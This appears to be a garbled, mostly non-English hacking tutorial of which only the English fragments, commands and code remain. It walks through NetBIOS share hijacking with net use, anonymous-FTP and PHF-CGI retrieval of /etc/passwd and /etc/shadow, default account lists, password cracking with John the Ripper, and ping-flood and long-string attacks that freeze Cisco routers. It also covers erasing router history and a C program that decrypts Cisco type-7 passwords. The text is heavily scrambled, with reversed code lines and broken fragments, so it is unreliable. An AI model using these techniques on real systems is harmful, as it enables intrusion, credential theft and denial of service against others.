:
ping -t www.***.com
ping -t -a -f www.***.com
ping www.***.com
com/com.wav
com3/com3/.wav
com1/com.wav
ping -w timeout www.***.com
NETSTAT -S
NETSTAT -A
NETSTAT -N
NETSTAT -P
drwatson
NetBios Attack
Home Network
LAN WAN MAN
.
: IP
.
-1 IP
) 207.107.1.1 (.
-2 START RUN
CMD .
-3 Nbtstat A IP
: ADRESS IP
IP ADRESS . ENTER
-4 :
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
------------------------------------------J-1 <00> UNIQUE Registered
WORK <00> GROUP Registered
J-1 <03> UNIQUE Registered
J-1 <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
:
.
-5 >< HEX
CODE VALUE 20
PRINTER
OR FILES SHARED TURNED ON
.
-6
:
<Net view \\<insert ip_address here
-7
:
Shared resources at \\ip_address
Sharename Type Comment
MY DOCUMENTS Disk
TEMP Disk
-8 TEMP
:
Net use x: \\<insert IP address
here>\temp
NSETBIOS
..
*
User name-Password
PASSWD
FTP=File Transfer Protocol
start==>run
telnet
Remote System
==> connect
Host Name
kahane.org
PORT 21
connect
..
!! source code
user anonymous
pass zzzoozz@yahoo.com
..
cute ftp - ws_ftp
ftp.kahane.org
retr /etc/passwd
etc/ passwd
Sunos 5.0 etc/shadow etc/passwd
Linux etc/shadow etc/passwd
BSD4.3 RENO etc/master.passwd
AIX etc/security/passwd
NT scripts/passwd
passwd
admin.pwl
exe
-:
<< command )
start>runcopy server.exe server.com
server
com,scr,bat
.
netstat
===========================
===================
NETSTAT
NETSTAT A-
NETSTAT E-
NETSTAT N-
NETSTAT P-
NETSTAT R-
NETSTAT S-
:
FTP
21
FTP
Superscanne
Start
Run
ftp n
FTP&g
Open
Enter
FTP&g
To
To
IP
Connected to www.assassin.com
websrv1 Microsoft FTP Service 220
).(Version 4.0
ftp&gquote user ftp
Anonymous acces allowed, send 331
.identify (e-mail name) as password
ftp&gquote cwd ~root
Please login with USER and PASS 530
ftp&gquote pass ftp
20
Pwd
Cd
Cd black
Ls
Get
Get black.exe
Put
**
Get
Put black.exe
Clos
:Codes: Signification
.Restart marker reply 110
Service ready in nnn minutes. (nnn 120
est un temps)
Data connection already open; 125
.transfer starting
File status oka about to open data 150
.connection
.Command okay 200
Command not implemented, 202
.superfluous at this site
System status, or system help 211
.reply
.Directory status 212
.File status 213
.Help message 214
.NAME system type 215
.Service ready for new user 220
.Service closing control connection 221
Data connection open; no transfer 225
.in progress
.Closing data connection 226
Entering passive mode (h1, h2, h3, 227
.h4, p1, p2)
sys : sys
sys : sysadm
sys : system
games : games
ftp : ftp
mail : mail
)
** Unix
( :
young
test
unpassworded accounts
.
:
GET /etc/passwd GET /etc/group
GET /etc/shadow
: :
data = download
.
===========================
========
? psswd
...
. root
: root
su username .
:
1
/etc .
2 shadow
shadow . unshadow
3 ..
...
:
sirhack:89fGc%^7&a, Ty:100:100: Sir
Hackalot: /usr/sirhack:/bin/sh
:
1 . sirhack :
2 . 89fGc%^7 :
3 . Sir Hackalot :
4 /usr/sirhack :
5 ) ** **( :
/bin/sh
.
===========================
========
? group
) (
passwd .
===========================
========
? shadow
psswd
...
===========================
========
:
1 . Cracker Jack
2 . John the ripper
**)**( ...
**
http://www.openwall.com/john/john1.6.tar.gz
http://www.openwall.com/john/john16w.zip
+++++++++++++++++++++++++++
+++++++++++++++++++++++
enter :
**
HELP = HELP
COPY = CP
MOVE = MV
DIR = LS
DEL = RM
CD = CD
WHO
) FINGER (
FINGER
:
**
/etc directory
passwd
Cracker Jack
http://www.geocities.com/SiliconValley/9
185
sable.ox.ac.uk/pub/wordlists
4 8
Cracker Jack
)(:
anonymously
ftp
/etc directory
Cracker Jack
PHF
**
http://xxx.xxx.xxx/cgi-bin/phf?Qali...t
%20/etc/passwd
**
backup
/etc/shadow
apache
:
+++++++++++++++++++++++++++
port
) (
......
)
( .
:
:
Start&gRun & l
command.com
:
ping host
:
ping port
enter
:
ping port1027
enter
:
ping port80
enter
:
ping
enter
:
ping port
enter
..
.
===========================
===========
&&&&&&&&&&&&&&&&&&&
netbios
http://digitalx.150m.com/1.htm
&&&&&&&&&&&&&&&&&&&
dos
^^^^^^^^^^^^^^^^^^^^^^^
http://b0iler.eyeonsecurity.net/tutorials/
powerdos.htm
Hacking
Networks Routers
.
Cisco Routers
... Cisco Systems
:
, cisco systems
,
.
------------------------------------ :
------------------------------------ :
IP ISP TCP/IP packet - spoof IP
, IP
IP
.
,,,,
:
log
IRC
ICQ
" "do not show ip
" "systat
IP- logging java
IP
Sub7 .NetBus
-------------------------------------------- : ISP ISP Internet Service
Provider
,,, dial-up
traceroute ISP
..
:
tracert 222.222.22.22
Tracing route to [221.223.24.54]
.over a maximum of 30 hops
147ms 122ms 132ms your.isp 1
[222.222.22.21]
122ms 143ms 123ms isp.firewall 2
[222.222.22.20]
156ms 142MS 122ms aol.com 3
[207.22.44.33]
Request timed out * * * 4
101ms 102ms 133ms cisco.router 5
[194.33.44.33]
233ms 143ms 102ms something.ip 6
[111.11.11.11]
222ms 123ms 213ms netcom.com 7
[122.11.21.21]
152ms 211ms 212ms blahblah.tts.net 8
[121.21.21.33]
122ms 223ms 243ms altavista.34.com 9
[121.22.32.43] <<< target's isp
101ms 122ms 132ms 10
221.223.24.54.altavista.34.com
[221.223.24.54]
.Trace complete
----------------------------------: TCP/IP packet -
logs
bandwidth
.
Ping flooding
: t-
,
. Unix
Linux ping -f
-------------------------------------------- : TraceRoute TraceRoute
,
,
MS-DOS prompt
" "tracert ip.address
.
firewalls ISP
) (internet service provider
TraceRoute :
TraceRoute
TCP/IP
packet header
, TTL
. Time To Live
TTL
,
..
, bandwidth TTL
..
ICMP
TraceRoute
-------------------------------------------- : proxy server
proxy server ,
telnet hyperterminal
===========================
===================
: cisco router
..
cisco router
..
...
cisco routers
:
T1 18
,
...
ISP
ISP
...
DENIAL OF SERVICE
Telnet .
packets
decoded
....
trusted systems
rcp rsh
)
rcp rsh
( Network Services
------------------------------------------------------------------- : cisco router
, ISP
traceroute
ISP )
( ISP traceroute
IP
ISP
...
, :
tracert 222.222.22.22
]Tracing route to [221.223.24.54
.over a maximum of 30 hops
147ms 122ms 132ms your.isp 1
][222.222.22.21
122ms 143ms 123ms isp.firewall 2
][222.222.22.20
156ms 142MS 122ms aol.com 3
][207.22.44.33
Request timed out * * * 4
,
firewall
Ping ,
firewall
firewall
firewall
23 ....
.. ,
..
,
.
..
proxy server
23
LOGs
------------------------------------------------------------------- : cisco router
v4.1 software
.
23
:
10293847465qpwoeirutyalskdjfhgzmxnc
bv019dsk1029384
7465qpwoeirutyalskdjfhgzmxncbv019ds
k10293847465qpw
oeirutyalskdjfhgzmxncbv019dsk102938
47465qpwoeiruty
alskdjfhgzmxncbv019dsk10293847465q
pwoeirutyalskdjf
hgzmxncbv019dsk10293847465qpwoeir
utyalskdjfhgzmxnc
bv019dsk10293847465qpwoeirutyalskdj
fhgzmxncbv019ds
k10293847465qpwoeirutyalskdjfhgzmxn
cbv019dsk
..
reboot ,
offline .
..
freeze 10-2
.. v4.1 software
,
DOS
.. ,
", "ping -l 56550 cisco.router.ip -t
frozen
..
)
(
" .... "admin
default
password ,
frozen
default
,
prompt " :
, "htl-textil "?"
, transfer
.. command
)
( IP
.. 23
:
) HyperTerminal
(
wait for a call
..
.
..
HyperTerminal
, yes
.
.. history
""history size 0
Logout
...
-------------------------------------------------------------------- : cisco router
. ..
John the Ripper
.
.
,
..
..
. compile
Ctli + Shift
<include <stdio.h#
<include <ctype.h#
} = []char xlat
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b,
,0x66, 0x6f
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65,
,0x77, 0x72
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
{;
;" char pw_str1[] = "password 7
;" char pw_str2[] = "enable-password 7
;char *pname
cdecrypt(enc_pw, dec_pw)
;char *enc_pw
;char *dec_pw
}
;unsigned int seed, i, val = 0
if(strlen(enc_pw) & 1)
;return(-1)
seed = (enc_pw[0] - '0') * 10 +
;'enc_pw[1] - '0
if (seed > 15 || !isdigit(enc_pw[0]) || !
isdigit(enc_pw[1]))
;return(-1)
} for (i = 2 ; i <= strlen(enc_pw); i++)
} if(i !=2 && !(i & 1))
;dec_pw[i / 2 - 2] = val ^ xlat[seed++]
;val = 0
{
;val *= 16
if(isdigit(enc_pw[i] =
} toupper(enc_pw[i])))
;'val += enc_pw[i] - '0
;continue
{
if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F')
}
;pname = argv[0]
if(argc > 1)
}
} if(argc > 3)
;()usage
;exit(1)
{
if(argv[1][0] == '-')
}
} switch(argv[1][1])
:'case 'h
;()usage
;break
:'case 'p
} if(cdecrypt(argv[2], passwd))
;fprintf(stderr, "Error.\n")
;exit(1)
{
fprintf(stdout, "password: %s\n",
;passwd)
;break
:default
fprintf(stderr, "%s: unknow option.",
;pname)
{
;return(0)
{
} if(!pw_pos)
;fprintf(stdout, "%s\n", line)
;continue
{
} if(cdecrypt(&line[pw_pos], passwd))
;fprintf(stderr, "Error.\n")
;exit(1)
{
} else
if(pw_pos == strlen(pw_str1))
;fprintf(out, "%s", pw_str1)
else
;fprintf(out, "%s", pw_str2)
;fprintf(out, "%s\n", passwd)
{
{
{
Linux
John the
. Ripper
--------------------------------------------John the Ripper
/http://www.openwall.com/john
-------------------------------------------
Session number to resume <1-99>
access-enable Create a temporary
Access-List entry
access-profile Apply user-profile to
interface
clear Reset functions
connect Open a terminal connection
disable Turn off privileged commands
disconnect Disconnect an existing
network connection
enable Turn on privileged commands
exit Exit from the EXEC
help Description of the interactive help
system
lock Lock the terminal
login Log in as a particular user
logout Exit from the EXEC
mls exec mls router commands
mrinfo Request neighbor and version
information from a multicast router
mstat Show statistics after multiple
multicast traceroutes
mtrace Trace reverse multicast path
from destination to source
name-connection Name an existing
network connection
pad Open a X.29 PAD connection
ping Send echo messages